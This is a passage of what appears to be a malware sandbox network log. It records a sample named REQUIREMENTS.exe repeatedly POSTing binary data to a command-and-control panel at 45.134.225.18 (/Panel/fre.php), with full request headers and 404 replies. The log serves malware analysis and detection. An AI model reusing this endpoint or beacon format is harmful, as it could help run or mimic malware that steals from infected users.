                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                360192.168.2.55009645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                361192.168.2.55009745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                362192.168.2.55009845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                363192.168.2.55009945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                364192.168.2.55010045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                365192.168.2.55010145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                366192.168.2.55010245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                367192.168.2.55010345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                368192.168.2.55010445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                369192.168.2.55010545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                37192.168.2.54976045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:38.851315975 CET137OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:38.937211990 CET137INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:39 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                370192.168.2.55010645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                371192.168.2.55010745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                372192.168.2.55010845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                373192.168.2.55010945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                374192.168.2.55011045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                375192.168.2.55011145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                376192.168.2.55011245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                377192.168.2.55011345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                378192.168.2.55011445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                379192.168.2.55011545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                38192.168.2.54976145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:39.128817081 CET138OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:39.214706898 CET138INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:39 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                380192.168.2.55011645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                381192.168.2.55011745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                382192.168.2.55011845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                383192.168.2.55011945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                384192.168.2.55012045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                385192.168.2.55012145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                386192.168.2.55012245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                387192.168.2.55012345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                39192.168.2.54976245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:39.411832094 CET139OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:39.497369051 CET140INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:39 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.54972445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:27.613622904 CET82OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:27.699301958 CET83INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:27 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                40192.168.2.54976345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:39.691335917 CET140OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:39.777168989 CET141INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:39 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                41192.168.2.54976445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:39.970139980 CET153OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:40.053940058 CET177INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:40 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                42192.168.2.54976545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:40.256458998 CET178OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:40.342034101 CET178INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:40 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                43192.168.2.54976645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:40.544862986 CET180OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:40.630984068 CET190INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:40 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                44192.168.2.54976945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:40.827678919 CET192OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:40.914031982 CET193INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:41 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                45192.168.2.54977045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:41.127338886 CET204OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:41.211886883 CET205INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:41 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                46192.168.2.54977145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:41.415931940 CET206OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:41.515589952 CET206INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:41 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                47192.168.2.54977245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:41.707979918 CET207OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:41.794048071 CET207INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:41 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                48192.168.2.54977345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:42.001523972 CET208OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:42.087030888 CET209INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:42 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                49192.168.2.54977445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:42.280194044 CET209OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:42.363287926 CET210INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:42 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.2.54972545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:27.897850037 CET84OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:27.983211994 CET84INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:28 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                50192.168.2.54977545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:42.578435898 CET211OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:42.663031101 CET211INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:42 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                51192.168.2.54977645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:42.863846064 CET212OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:42.950898886 CET213INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:43 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                52192.168.2.54977745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:43.142497063 CET213OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:43.228351116 CET214INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:43 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                53192.168.2.54977845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:43.423937082 CET215OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:43.508586884 CET215INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:43 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                54192.168.2.54977945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:43.713190079 CET216OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:43.798624039 CET216INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:43 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                55192.168.2.54978045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:43.993844986 CET217OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:44.080899954 CET218INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:44 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                56192.168.2.54978145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:44.276961088 CET218OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:44.361351967 CET219INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:44 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                57192.168.2.54978245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:44.565448046 CET220OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:44.651638031 CET220INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:44 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                58192.168.2.54978345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:44.874322891 CET221OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:44.961149931 CET222INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:45 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                59192.168.2.54978445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:45.171967030 CET222OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:45.255328894 CET223INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:45 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.2.54972645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:28.184462070 CET85OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:28.269916058 CET86INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:28 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                60192.168.2.54978545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:45.452903032 CET224OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
